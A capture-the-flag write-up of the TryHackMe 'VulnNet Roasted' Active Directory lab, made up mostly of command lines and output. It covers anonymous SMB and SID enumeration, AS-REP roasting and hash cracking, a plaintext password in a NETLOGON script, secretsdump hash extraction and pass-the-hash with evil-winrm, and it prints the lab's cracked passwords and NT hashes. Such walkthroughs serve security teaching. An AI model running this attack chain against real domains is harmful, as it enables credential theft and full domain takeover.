We always start with an nmap scan…..
nmap -sC -sV -Pn -oA nmap 10.10.108.117 -T5
┌──(muzec㉿Muzec-Security)-[~/Documents/TryHackMe/vulnetroasted]
└─$ nmap -sC -sV -Pn -oA nmap 10.10.108.117 -T5
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-12 08:58 WAT
Nmap scan report for 10.10.108.117
Host is up (0.24s latency).
Not shown: 990 filtered ports
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: vulnnet-rst.local0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: vulnnet-rst.local0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
Service Info: Host: WIN-2BO8M1OE1M1; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 3h00m01s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2021-07-12T10:59:45
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 95.97 seconds
Seems we are dealing with Active Directory cool let confirm if we have port 5985 open for Winrm.
┌──(muzec㉿Muzec-Security)-[~/Documents/TryHackMe/vulnetroasted]
└─$ nmap -sC -sV -Pn -p 5985 10.10.108.117
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-12 09:07 WAT
Nmap scan report for 10.10.108.117
Host is up (0.19s latency).
PORT STATE SERVICE VERSION
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.99 seconds
I love checking the Winrm port it can be useful in future now let start with our enumeration on SMB.
┌──(muzec㉿Muzec-Security)-[~/Documents/TryHackMe/vulnetroasted]
└─$ smbclient -L //10.10.108.117/ -N
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
VulnNet-Business-Anonymous Disk VulnNet Business Sharing
VulnNet-Enterprise-Anonymous Disk VulnNet Enterprise Sharing
SMB1 disabled -- no workgroup available
Some shares we allow have access to VulnNet-Business-Anonymous and VulnNet-Enterprise-Anonymous but nah nothing is useful in the shares now let look at impacket lookupsid.py to enumerate for users.
┌──(muzec㉿Muzec-Security)-[~/Documents/TryHackMe/vulnetroasted]
└─$ lookupsid.py anonymous@10.10.108.117
Impacket v0.9.24.dev1+20210629.123513.142cacb6 - Copyright 2021 SecureAuth Corporation
Password:
[*] Brute forcing SIDs at 10.10.108.117
[*] StringBinding ncacn_np:10.10.108.117[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-1589833671-435344116-4136949213
498: VULNNET-RST\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: VULNNET-RST\Administrator (SidTypeUser)
501: VULNNET-RST\Guest (SidTypeUser)
502: VULNNET-RST\krbtgt (SidTypeUser)
512: VULNNET-RST\Domain Admins (SidTypeGroup)
513: VULNNET-RST\Domain Users (SidTypeGroup)
514: VULNNET-RST\Domain Guests (SidTypeGroup)
515: VULNNET-RST\Domain Computers (SidTypeGroup)
516: VULNNET-RST\Domain Controllers (SidTypeGroup)
517: VULNNET-RST\Cert Publishers (SidTypeAlias)
518: VULNNET-RST\Schema Admins (SidTypeGroup)
519: VULNNET-RST\Enterprise Admins (SidTypeGroup)
520: VULNNET-RST\Group Policy Creator Owners (SidTypeGroup)
521: VULNNET-RST\Read-only Domain Controllers (SidTypeGroup)
522: VULNNET-RST\Cloneable Domain Controllers (SidTypeGroup)
525: VULNNET-RST\Protected Users (SidTypeGroup)
526: VULNNET-RST\Key Admins (SidTypeGroup)
527: VULNNET-RST\Enterprise Key Admins (SidTypeGroup)
553: VULNNET-RST\RAS and IAS Servers (SidTypeAlias)
571: VULNNET-RST\Allowed RODC Password Replication Group (SidTypeAlias)
572: VULNNET-RST\Denied RODC Password Replication Group (SidTypeAlias)
1000: VULNNET-RST\WIN-2BO8M1OE1M1$ (SidTypeUser)
1101: VULNNET-RST\DnsAdmins (SidTypeAlias)
1102: VULNNET-RST\DnsUpdateProxy (SidTypeGroup)
1104: VULNNET-RST\enterprise-core-vn (SidTypeUser)
1105: VULNNET-RST\a-whitehat (SidTypeUser)
1109: VULNNET-RST\t-skid (SidTypeUser)
1110: VULNNET-RST\j-goldenhand (SidTypeUser)
1111: VULNNET-RST\j-leet (SidTypeUser)
We only need the SidTypeUser.
Administrator
Guest
krbtgt
WIN-2BO8M1OE1M1$
enterprise-core-vn
a-whitehat
t-skid
j-goldenhand
j-leet
If Kerberos pre-authentication is disabled on any of the above accounts, we can use the GetNPUsers impacket script to send a request for authentication KDC which will then return a TGT that is encrypted with the user’s password.
NOTE:- add vulnnet-rst.local with IP to /etc/hosts
┌──(muzec㉿Muzec-Security)-[~/Documents/TryHackMe/vulnetroasted]
└─$ GetNPUsers.py -dc-ip vulnnet-rst.local vulnnet-rst.local/t-skid -no-pass
Impacket v0.9.24.dev1+20210629.123513.142cacb6 - Copyright 2021 SecureAuth Corporation
[*] Getting TGT for t-skid
$krb5asrep$23$t-skid@VULNNET-RST.LOCAL:7bfbc6a7a10f6496e1420c5b78356206$083b8715ab6ee61199460164f2b0658cd2461f787279e216b91b4372daee175c9d18960178f8f7594d1cdb991e4b03e18c1ba422620178be04499cceb6e77680aca65eafb479f018b3b90ac3bd5ad94918e25c0e26227624d69000e33486c92735eb2a42bce47b816feaa6e0b8bfad800829658f3116ae9324549976fe1d4a6df49b1bbeb72d8016582516faffa78801e052eb2b8ea04c6ad807d7fe8c3d626a0ea6a1e70e52cb4c98f2683adba9e3bf8214f6a5b5c183484f3f4f3dfc96920402d4c05a56772e0174e1b33d9523d34e768f51fd7b958b80934de0484a14b2d25490c7eac00d19a963aba0a32fc6d566c00a6085deea
Kerberos pre-authentication was disabled for user t-skid and we have the hash let crack it using John The Ripper .
┌──(muzec㉿Muzec-Security)-[~/Documents/TryHackMe/vulnetroasted]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 256/256 AVX2 8x])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
tj072889* ($krb5asrep$23$t-skid@VULNNET-RST.LOCAL)
1g 0:00:00:04 DONE (2021-07-12 09:38) 0.2087g/s 663569p/s 663569c/s 663569C/s tjalling..tj0216044
Use the "--show" option to display all of the cracked passwords reliably
Session completed
Now we have credentials let try it on SMB.
┌──(muzec㉿Muzec-Security)-[~/Documents/TryHackMe/vulnetroasted]
└─$ smbclient -L //10.10.108.117/ -U t-skid
Enter WORKGROUP\t-skid's password:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
VulnNet-Business-Anonymous Disk VulnNet Business Sharing
VulnNet-Enterprise-Anonymous Disk VulnNet Enterprise Sharing
SMB1 disabled -- no workgroup available
┌──(muzec㉿Muzec-Security)-[~/Documents/TryHackMe/vulnetroasted]
└─$ smbclient //10.10.108.117/NETLOGON -U t-skid
Enter WORKGROUP\t-skid's password:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Wed Mar 17 00:15:49 2021
.. D 0 Wed Mar 17 00:15:49 2021
ResetPassword.vbs A 2821 Wed Mar 17 00:18:14 2021
8771839 blocks of size 4096. 4553504 blocks available
smb: \>
Downloaded to my attacking machine let strings the vbs file.
┌──(muzec㉿Muzec-Security)-[~/Documents/TryHackMe/vulnetroasted]
└─$ strings ResetPassword.vbs
Option Explicit
Dim objRootDSE, strDNSDomain, objTrans, strNetBIOSDomain
Dim strUserDN, objUser, strPassword, strUserNTName
' Constants for the NameTranslate object.
Const ADS_NAME_INITTYPE_GC = 3
Const ADS_NAME_TYPE_NT4 = 3
Const ADS_NAME_TYPE_1779 = 1
If (Wscript.Arguments.Count <> 0) Then
Wscript.Echo "Syntax Error. Correct syntax is:"
Wscript.Echo "cscript ResetPassword.vbs"
Wscript.Quit
End If
strUserNTName = "a-whitehat"
strPassword = "bNdKVkjv3RR9ht"
' Determine DNS domain name from RootDSE object.
Set objRootDSE = GetObject("LDAP://RootDSE")
strDNSDomain = objRootDSE.Get("defaultNamingContext")
' Use the NameTranslate object to find the NetBIOS domain name from the
' DNS domain name.
Set objTrans = CreateObject("NameTranslate")
objTrans.Init ADS_NAME_INITTYPE_GC, ""
objTrans.Set ADS_NAME_TYPE_1779, strDNSDomain
strNetBIOSDomain = objTrans.Get(ADS_NAME_TYPE_NT4)
' Remove trailing backslash.
strNetBIOSDomain = Left(strNetBIOSDomain, Len(strNetBIOSDomain) - 1)
' Use the NameTranslate object to convert the NT user name to the
' Distinguished Name required for the LDAP provider.
On Error Resume Next
objTrans.Set ADS_NAME_TYPE_NT4, strNetBIOSDomain & "\" & strUserNTName
If (Err.Number <> 0) Then
On Error GoTo 0
Wscript.Echo "User " & strUserNTName _
& " not found in Active Directory"
Wscript.Echo "Program aborted"
Wscript.Quit
End If
strUserDN = objTrans.Get(ADS_NAME_TYPE_1779)
Another credentials cool let confirm which permission we have with crackmapexec .
┌──(muzec㉿Muzec-Security)-[~/Documents/TryHackMe/vulnetroasted]
└─$ crackmapexec smb 10.10.108.117 -u a-whitehat -p bNdKVkjv3RR9ht
SMB 10.10.108.117 445 WIN-2BO8M1OE1M1 [*] Windows 10.0 Build 17763 x64 (name:WIN-2BO8M1OE1M1) (domain:vulnnet-rst.local) (signing:True) (SMBv1:False)
SMB 10.10.108.117 445 WIN-2BO8M1OE1M1 [+] vulnnet-rst.local\a-whitehat:bNdKVkjv3RR9ht (Pwn3d!)
We got Pwn3d now that is interesting back to Impacket to use ` secretsdump.py` .
┌──(muzec㉿Muzec-Security)-[~/Documents/TryHackMe/vulnetroasted]
└─$ secretsdump.py vulnnet-rst.local/a-whitehat:bNdKVkjv3RR9ht@10.10.108.117
Impacket v0.9.24.dev1+20210629.123513.142cacb6 - Copyright 2021 SecureAuth Corporation
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0xf10a2788aef5f622149a41b2c745f49a
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c2597747aa5e43022a3a3049a3c3b09d:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
So i dump all users hashes now we can use evil-winrm with the pass the hash attack to gain administrator access.
┌──(muzec㉿Muzec-Security)-[~/Documents/TryHackMe/vulnetroasted]
└─$ evil-winrm -i 10.10.108.117 -u administrator -H c2597747aa5e43022a3a3049a3c3b09d
Evil-WinRM shell v2.4
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami /all
USER INFORMATION
----------------
User Name SID
========================= ============================================
vulnnet-rst\administrator S-1-5-21-1589833671-435344116-4136949213-500
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
================================================== ================ ============================================ ======================================================
=========
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Administrators Alias S-1-5-32-544 Mandatory group, Enabled by default, Enabled group, Gr
oup owner
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
VULNNET-RST\Group Policy Creator Owners Group S-1-5-21-1589833671-435344116-4136949213-520 Mandatory group, Enabled by default, Enabled group
VULNNET-RST\Domain Admins Group S-1-5-21-1589833671-435344116-4136949213-512 Mandatory group, Enabled by default, Enabled group
VULNNET-RST\Enterprise Admins Group S-1-5-21-1589833671-435344116-4136949213-519 Mandatory group, Enabled by default, Enabled group
VULNNET-RST\Schema Admins Group S-1-5-21-1589833671-435344116-4136949213-518 Mandatory group, Enabled by default, Enabled group
We are in and done.
Greeting From Muzec